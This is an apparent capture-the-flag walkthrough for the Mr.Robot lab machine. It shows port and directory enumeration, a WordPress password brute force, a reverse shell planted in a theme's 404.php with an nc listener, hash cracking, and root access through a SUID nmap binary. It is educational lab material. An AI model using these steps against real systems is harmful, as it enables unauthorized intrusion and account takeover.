- Information
- name:
Mr.Robot - OS:
Linux - Difficulty:
Easy - Discription:
-
This is my second time doing this BOX, it is very interesting and easy -
I recommend it to everyone who has watched the Mr.Robot series
-
Summary
- Enumerating 80 port with GoBuster.
- Brute forcing WP with Hydra.
- Reverse shell through 404.php.
- Cracking md5 password.
- Loggin as robot and privilege escalation to root.
nmap
root@kali:~# nmap -sC -sV 10.10.145.82
Nmap scan report for 10.10.145.82
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
First Key
* On 80 port we got cool webpage but nothing useful.
* So i started enumeration.
gobuster dir 10.10.116.11 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
* After some time we got webpage called blog, so we found WP and let’s go /wp-admin.php.
* Lets do users enumeration
wpscan --url 10.10.116.11 --enumerate u
* After some time we got one user Elliot
* When we look /robots.txt we got something really useful
User-agent: *
fsocity.dic
key-1-of-3.txt
* We got first key
Second Key
* When we look /fsocity.dic its basically wordlist
* Let’s download wordlist and try to use on WP login
wget http://10.10.116.11/fsocity.dic
* Before we do brute force on WP lets remove special characters from wordlist
sort fsocity.dic | uniq > fsocity-sorted.dic
* Now lets perform brute force on WP login
wpscan --url 10.10.116.11 --wp-content-dir wp-admin --usernames elliot --passwords ~/Downloads/fsocity-sorted.dic
* After 2 minutes i got password
* Let’s login
* Theme is Twenty Fifteen so let’s do reverse shell
* Go to Appearance > Editor and choose 404.php
* I will use PentestMonkey reverse shell so i recommended to use this reverse shell
* Make sure listener is on (nc -lvnp port)
* Now go to the page http://10.10.116.11/wp-content/themes/twentyfifteen/404.php
* And boom we have a shell as dameon
* Let’s upgrade shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
* After a while i found md5-password in /home/robot/ i can read it
* Lets try to crack it and login as robot
* You can use John to crack it but i will use webpage CrackStation, just copy paste :)
* We can’t ssh so let’s just try to use su robot
* And we are in, now we can read key number 2
Privilege escalation to root (third key)
* Let’s try to use command find to escalate to root
find / -perm -u=s -type f 2>/dev/null
* And we can see nmap so lets try to get root through interactive mode
nmap --interacive
!sh
* And as you can see we are root so we can take third key
Amar#0484